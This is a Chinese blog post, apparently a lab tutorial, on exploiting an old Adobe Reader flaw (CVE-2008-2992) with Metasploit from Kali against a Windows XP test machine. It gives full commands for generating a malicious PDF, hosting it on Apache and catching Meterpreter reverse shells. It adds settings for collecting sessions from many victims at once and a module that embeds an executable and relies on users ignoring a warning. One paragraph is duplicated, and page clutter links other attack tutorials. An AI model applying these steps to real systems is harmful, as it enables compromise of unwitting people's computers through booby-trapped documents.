[Kali]--攻击PDF漏洞

最新推荐文章于 2023-07-13 18:22:10 发布
最新推荐文章于 2023-07-13 18:22:10 发布
阅读量972 收藏 9
点赞数 1
分类专栏: Kali 文章标签: kali linux metasploit 渗透测试 pdf漏洞 adobe reader
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42633229/article/details/109535367
版权

攻击PDF漏洞

如果某人使用的PDF软件存在安全漏洞,还打开了恶意PDF文档,那么他的PDF程序就会遭受攻击。

windows系统上的PDF程序Adobe Reader自古以来就常常爆出安全漏洞。

环境

winxp:192.168.17.130

​ 8.1.2版本的Adobe Reader(cve-2008-2992)

kali:192.168.17.129

模块
exploit/windows/fileformat/adobe_utilprintf

use exploit/windows/fileformat/adobe_utilprintf

image-20201027104754657

options:

​ filename: 生成的恶意文档名称,默认msf.pdf(文件位置:/root/.msf4/local/msf.pdf)

接下来kali将这个pdf文档发布到网上。

启动apache服务:

service apache2 start

cp /root/.msf4/local/msf.pdf /var/www/html

设置独立的连接受理程序:

use multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.17.129

exploit

image-20201027105254020

下载

winxp主机访问 http://192.168.17.129/msf.pdf地址下载该文档,使用adobe reader打开文件。

此时kali会话连接成功。

该方法存在的问题是,一旦第一个会话建立成功,有multi/handler模块提供的会话受理程序就会自动关闭。当我们成批量的发布恶意文档时,如果有后续用户继续打开恶意文档,后续的会话就不会受理。

面对这种情况,我们需要使用该模块的高级选项。

set exitonsession false

exploit -j

exitonsession默认为true,将该值设置为false,就可以使得处理程序的监听器始终保持监听状态,这样就能单个程序受理多个会话了。

exploit -j是为了以作业的方式在后台启动会话受理程序,保持msfconsole前端操作界面。

PDF内嵌可执行文件

use exploit/windows/fileformat/adobe_pdf_embeded_exe

options:

​ exename:指定预先准备的可执行文件,如果不设置该选项,也可以指定任意payload把它生成一个exe文件嵌入到pdf文档中。

​ filename:生成的pdf文件名

​ infilename:原生的用来被嵌入的pdf文件名

​ launch_message:显示给用户的提示信息

设置好模块选项,然后设置独立的连接受理程序。

生成pdf文件位置与上面生成位置相同。

当用户打开含有恶意程序的pdf文档时,会收到一个提示警告。该攻击是否能够成功完全取决于用户是否忽视该警告。

置独立的连接受理程序。

生成pdf文件位置与上面生成位置相同。

当用户打开含有恶意程序的pdf文档时,会收到一个提示警告。该攻击是否能够成功完全取决于用户是否忽视该警告。

一旦用户忽视警告继续打开文件,那么我们就能得到一个会话。

wwxxee
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
PDF漏洞(CVE-2018-12794)浅析
weixin_33757911的博客
05-08 737
漏洞简介 CVE-2018-12794属于类型混淆漏洞,产生漏洞原因是通过构建XML数据包(XML Data Package,XDP)模版,并对XML表单体系结构(XML Forms Architecture,XFA)对象执行某些JavaScript操作,***者就可以强制Adobe Reader从模版对象的边界引用数据。 2018年7月份,Adobe补丁更新: 漏洞基本信息 漏洞ID:CVE-...
2016-03-21 kali下学习寻找漏洞攻击测试
dingqiangzhen9665的博客
03-21 219
使用 sqlmap 扫描某网站网址,寻找潜在漏洞,可进行注入攻击。 1 sqlmap -u http://www.xxxxx.com --dbs --current-user 2 sqlmap -u http://www.xxxxx.com --tables 找到可注入漏洞后,破解数据库表的用户名,暴力破解密码,找到adminiter账户,用nikto寻找网站...
Kali——Metasploit的漏洞渗透(对操作系统、应用程序、客户端攻击
董哥的黑板报
07-24 3672
一、查看Metasploit的漏洞渗透模块 从左到右依次为: 序号、模块的名称、披露日期、威胁等级、Check、模块的描述 模块的威胁等级分为: excellent(该模块在绝大多数环境下正常执行)、great、good、normal(模块可以执行,但是对目标有严格的要求)、average、lowRank(这类模块很难执行)、manual(该模块几乎不能执行) 模块名称的命名规则: 三...
Kali攻击MS17-010系统漏洞
qq_33391644的博客
08-23 1857
攻击机:192.168.1.7 kali linux2019.2 x64 靶机:192.168.1.5 win7 x64(455端口一定要开启,系统不能带有ms17-010补丁,通过https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010查看补丁名称,并删除掉靶机里面的ms1...
KALI利用MS17-010漏洞入侵
Shass的博客
11-27 6189
KALI利用MS17-010漏洞入侵 实验环境 靶机 : Windows Server 2008 R2 ,开放445端口( Windows防火墙不必关闭)。 攻击机: KALI,利用Meterpreter渗透工具漏洞︰MS17-010永恒之蓝(EternalBlue)漏洞。 操作步骤 1)先利用NMAP扫描靶机是否开启了445端口。 2)在kali上启动msfconsole 3)扫描靶机的漏洞情况 4)利用MS17-010漏洞攻击靶机 msf5 auxiliary(scanner/smb/smb_ms
kali-linux-2023.3-vmware-amd64.part1.rar
最新发布
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
kali-linux常用命令.pdf
09-29
kali-linux常用命令.pdf
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
Kali渗透测试:使用Armitage针对漏洞进行攻击
Liu_Bruce的博客
05-17 1659
Kali渗透测试:使用Armitage针对漏洞进行攻击 以ms17_010_eternable模块为例(“永恒之蓝”)经典的漏洞,单击这个模块以后就可以开始攻击了。 实 验 环 境 攻击机:Linux kali 5.10.0. IP : 192.168.68.125 靶机: Win2008 IP: 192.168.68.205 实 验 步 骤 1. 在工作区搜索ms17_010模块 打开Armitage,搜索ms17_010模块,如下图所示: 2. 选中ms17_010_eternablu
技术分享:Adobe Reader9 PDF攻击漏洞复现
liu914589417的博客
05-05 678
技术分享:Adobe Reader9 PDF攻击漏洞复现 实验工具 1、 VMware虚拟机 2、 Kali 2021 系统虚拟机 3、Windows XP系统虚拟机 1、在VMware中打开Kali 2021虚拟机和Windows XP虚拟机,并确保两台机器能够互相【Ping】通,网络连接正常。 2、确定能连通后,回到Kali 2021虚拟机,打开两个终端,分别开启【MSF攻击框架】,输入命令【msfconsole】。 3、在其中一个MSF攻击框架中输入命令,生成PDF文件,输入命令加载漏洞模块。命令
Kali学习 | 漏洞利用:4.10 PDF文件攻击
qq_43233085的博客
01-12 1685
Kali学习 | 漏洞利用:4.10 PDF文件攻击 PDF介绍操作步骤 PDF介绍 PDF是一种文件格式,该文件的使用比较广泛,并且容易传输。 通常在工作中,用户都是从工作程序中打开了一个合法的PDF文档。 当打开该文档时,该用户的主机就有可能被攻击。 Metasploit提供了一个渗透攻击模块,可以来创建一个攻击载荷,通过传递该攻击载荷对目标系统进行渗透攻击。 操作步骤 (1)启动MSFCON...
PDF签名系列(1):PDF签名机制的漏洞分析
小强快跑~~
01-17 693
来源:PDF签名系列(1):PDF签名机制的漏洞分析 - 知乎 研究PDF文件的签名机制有一段时间了,刚开始学习的时候就看到有提到说,被签名的PDF内容的Range gap,会成为这个机制的漏洞,但是一直不能完全参透。直到昨天看到一篇文章的分析,才对这个问题有了一个更清晰的认识,所以做一个小小总结整理。 这里假设读者对PDF文件格式和数字签名的原理有一定了解。 首先,我们来看一下PDF文档里的Signature Dictionary: 我们知道,PDF文件是由一系列Objects组成的,通过
实验三 kali下metasploit的漏洞攻击实践
weixin_30501857的博客
10-28 1138
一、实验内容 1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限。 2.分析攻击的原理以及获取了什么样的权限。 二、实验要求 1.熟悉kali原理和使用方法。 2.认真操作,详细记录实验过程和实验结果。 三、实验工具 笔记本电脑一台,安装parallels desktop虚拟机,安装kali和靶机系统windows10。另外安装了vmwar...
Kali学习 | 漏洞利用:4.5 渗透攻击MySQL数据库服务
qq_43233085的博客
01-10 2072
Kali学习 | 漏洞利用:4.5 渗透攻击MySQL数据库服务MySQL介绍操作步骤 MySQL介绍 MySQL是一个关系型数据库管理系统,由瑞典MySQLAB公司开发,目前属于Oracle公司。 在Metasploitable系统中,MySQL的身份认证存在漏洞。 该漏洞有可能会让潜在的攻击者不必提供正确的身份证书便可访问MySQL数据库。 所以,用户可以利用该漏洞,对MySQL服务进行渗透攻...
kali 漏洞利用
ReZero's Blog
01-26 666
medusa -h target_ip -u uer -p passsword -M service u可替换为U后跟文件,同理p也可 M 后跟所攻击的服务(例如SSH) 2.
"隐写术" - 深入研究 PDF混淆漏洞
neal1991的专栏
01-27 1288
原文:"steganography" - obfuscating PDF exploits in depth译者:neal1991welcome to star my a...
七、Kali Linux 2 渗透攻击
m0_55313512的博客
02-20 4819
Kali Linux 网络渗透测试
热门开源PDF库 Ghostscript中存在严重的RCE漏洞
smellycat000的专栏
07-13 600
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士广泛用于 Linux 中的PostScript 语言和 PDF 文件的开源解释器 Ghostscript 易受一个严重远程代码执行 (RCE) 漏洞影响。该漏洞编号是CVE-2023-3664,CVSS评分为9.8,影响所有早于10.01.2的 Ghostscript 版本。Kroll 公司的分析师 G.Glass 和 D.Truman 开发了相...
kali-everything 安装
09-06
要安装kali-everything,可以使用以下解决方案:首先,使用命令"apt-get install kali-tools-top10"来安装kali的前十工具。接下来,使用命令"sudo apt-get install kali-linux-everything"来安装kali的所有软件包。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值